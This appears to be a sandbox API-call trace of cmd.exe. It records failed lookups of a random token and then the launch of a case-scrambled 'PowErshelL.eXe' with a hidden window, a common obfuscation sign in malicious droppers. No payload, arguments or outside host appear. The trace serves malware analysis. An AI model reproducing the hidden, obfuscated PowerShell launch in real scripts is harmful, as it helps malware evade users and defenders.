	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DPATH") returned 19
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="KEYS") returned 12
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MOVE") returned 10
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PUSHD") returned 7
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="POPD") returned 7
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ASSOC") returned 22
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FTYPE") returned 17
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="BREAK") returned 21
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COLOR") returned 20
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKLINK") returned 10
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DIR") returned 19
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ERASE") returned 18
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DEL") returned 19
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TYPE") returned 3
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COPY") returned 20
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CD") returned 20
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CHDIR") returned 20
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RENAME") returned 5
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REN") returned 5
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ECHO") returned 18
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SET") returned 4
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PAUSE") returned 7
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DATE") returned 19
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TIME") returned 3
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PROMPT") returned 7
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MD") returned 10
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKDIR") returned 10
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RD") returned 5
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RMDIR") returned 5
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PATH") returned 7
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="GOTO") returned 16
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SHIFT") returned 4
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CLS") returned 20
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CALL") returned 20
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VERIFY") returned 1
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VER") returned 1
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VOL") returned 1
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="EXIT") returned 18
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SETLOCAL") returned 4
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ENDLOCAL") returned 18
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TITLE") returned 3
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="START") returned 4
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DPATH") returned 19
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="KEYS") returned 12
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MOVE") returned 10
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PUSHD") returned 7
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="POPD") returned 7
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ASSOC") returned 22
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FTYPE") returned 17
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="BREAK") returned 21
	[0051.218] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COLOR") returned 20
	[0051.219] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKLINK") returned 10
	[0051.219] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FOR") returned 17
	[0051.219] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="IF") returned 14
	[0051.219] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REM") returned 5
	[0051.219] GetProcessHeap () returned 0x250000
	[0051.219] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x251800
	[0051.219] GetProcessHeap () returned 0x250000
	[0051.219] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x34) returned 0x266a60
	[0051.219] _wcsnicmp (_String1="WNjK", _String2="cmd ", _MaxCount=0x4) returned 20
	[0051.220] GetProcessHeap () returned 0x250000
	[0051.220] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x420) returned 0x26afd0
	[0051.220] SetErrorMode (uMode=0x0) returned 0x0
	[0051.220] SetErrorMode (uMode=0x1) returned 0x0
	[0051.220] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x26afe0, lpFilePart=0x1eef90 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x1eef90*="Documents") returned 0x1b
	[0051.220] SetErrorMode (uMode=0x0) returned 0x1
	[0051.220] GetProcessHeap () returned 0x250000
	[0051.220] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26afd0, Size=0x68) returned 0x26afd0
	[0051.220] GetProcessHeap () returned 0x250000
	[0051.220] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26afd0) returned 0x68
	[0051.220] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0051.220] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0051.220] GetProcessHeap () returned 0x250000
	[0051.220] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x170) returned 0x251a20
	[0051.220] GetProcessHeap () returned 0x250000
	[0051.220] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2d0) returned 0x26b050
	[0051.225] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0051.225] GetProcessHeap () returned 0x250000
	[0051.225] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xe8) returned 0x251ba0
	[0051.226] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.226] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x1eed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed00) returned 0xffffffffffffffff
	[0051.226] GetLastError () returned 0x2
	[0051.226] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x1eed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed00) returned 0xffffffffffffffff
	[0051.226] GetLastError () returned 0x2
	[0051.227] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.227] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x1eed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed00) returned 0xffffffffffffffff
	[0051.227] GetLastError () returned 0x2
	[0051.227] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x1eed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed00) returned 0xffffffffffffffff
	[0051.227] GetLastError () returned 0x2
	[0051.228] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.228] FindFirstFileExW (in: lpFileName="C:\\Windows\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x1eed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed00) returned 0xffffffffffffffff
	[0051.228] GetLastError () returned 0x2
	[0051.228] FindFirstFileExW (in: lpFileName="C:\\Windows\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x1eed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed00) returned 0xffffffffffffffff
	[0051.229] GetLastError () returned 0x2
	[0051.229] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.229] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x1eed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed00) returned 0xffffffffffffffff
	[0051.229] GetLastError () returned 0x2
	[0051.229] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x1eed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed00) returned 0xffffffffffffffff
	[0051.230] GetLastError () returned 0x2
	[0051.230] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.230] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x1eed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed00) returned 0xffffffffffffffff
	[0051.231] GetLastError () returned 0x2
	[0051.232] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x1eed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed00) returned 0xffffffffffffffff
	[0051.233] GetLastError () returned 0x2
	[0051.233] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.233] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x1eed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed00) returned 0xffffffffffffffff
	[0051.235] GetLastError () returned 0x2
	[0051.235] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x1eed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed00) returned 0xffffffffffffffff
	[0051.236] GetLastError () returned 0x2
	[0051.237] _get_osfhandle (_FileHandle=2) returned 0xb
	[0051.237] GetFileType (hFile=0xb) returned 0x2
	[0051.286] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0051.286] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ef158 | out: lpMode=0x1ef158) returned 1
	[0051.286] _get_osfhandle (_FileHandle=2) returned 0xb
	[0051.286] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1ef190 | out: lpConsoleScreenBufferInfo=0x1ef190) returned 1
	[0051.286] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0051.287] GetConsoleTitleW (in: lpConsoleTitle=0x1ef640, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0051.287] GetFileAttributesW (lpFileName="PowErshelL.eXe" (normalized: "c:\\users\\aetadzjz\\documents\\powershell.exe")) returned 0xffffffff
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0051.288] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0051.289] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="FOR") returned 10
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="IF") returned 7
	[0051.290] _wcsicmp (_String1="PowErshelL", _String2="REM") returned -2
	[0051.290] SetErrorMode (uMode=0x0) returned 0x0
	[0051.290] SetErrorMode (uMode=0x1) returned 0x0
	[0051.290] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x26b640, lpFilePart=0x1eeed0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x1eeed0*="Documents") returned 0x1b
	[0051.290] SetErrorMode (uMode=0x0) returned 0x1
	[0051.321] GetProcessHeap () returned 0x250000
	[0051.321] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26b630, Size=0x66) returned 0x26b630
	[0051.321] GetProcessHeap () returned 0x250000
	[0051.321] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26b630) returned 0x66
	[0051.321] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0051.321] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0051.321] GetProcessHeap () returned 0x250000
	[0051.321] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x170) returned 0x251c30
	[0051.321] GetProcessHeap () returned 0x250000
	[0051.321] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2d0) returned 0x26b6b0
	[0051.322] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0051.330] GetProcessHeap () returned 0x250000
	[0051.330] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xe8) returned 0x26b840
	[0051.330] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.330] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0xffffffffffffffff
	[0051.330] GetLastError () returned 0x2
	[0051.331] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0xffffffffffffffff
	[0051.331] GetLastError () returned 0x2
	[0051.331] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0xffffffffffffffff
	[0051.331] GetLastError () returned 0x2
	[0051.331] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.332] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0xffffffffffffffff
	[0051.332] GetLastError () returned 0x2
	[0051.332] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0xffffffffffffffff
	[0051.332] GetLastError () returned 0x2
	[0051.332] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0xffffffffffffffff
	[0051.333] GetLastError () returned 0x2
	[0051.333] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.333] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0xffffffffffffffff
	[0051.333] GetLastError () returned 0x2
	[0051.333] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0xffffffffffffffff
	[0051.334] GetLastError () returned 0x2
	[0051.334] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0xffffffffffffffff
	[0051.334] GetLastError () returned 0x2
	[0051.334] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.334] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0xffffffffffffffff
	[0051.335] GetLastError () returned 0x2
	[0051.335] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0xffffffffffffffff
	[0051.335] GetLastError () returned 0x2
	[0051.335] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0xffffffffffffffff
	[0051.335] GetLastError () returned 0x2
	[0051.335] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.336] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x1eec40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec40) returned 0x26a480
	[0051.336] GetProcessHeap () returned 0x250000
	[0051.336] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x28) returned 0x2649a0
	[0051.336] FindClose (in: hFindFile=0x26a480 | out: hFindFile=0x26a480) returned 1
	[0051.336] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
	[0051.336] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
	[0051.336] GetConsoleTitleW (in: lpConsoleTitle=0x1ef190, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0051.336] InitializeProcThreadAttributeList (in: lpAttributeList=0x1eef48, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1eef08 | out: lpAttributeList=0x1eef48, lpSize=0x1eef08) returned 1
	[0051.336] UpdateProcThreadAttribute (in: lpAttributeList=0x1eef48, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eeef8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1eef48, lpPreviousValue=0x0) returned 1
	[0051.336] GetStartupInfoW (in: lpStartupInfo=0x1ef060 | out: lpStartupInfo=0x1ef060*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0051.337] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1
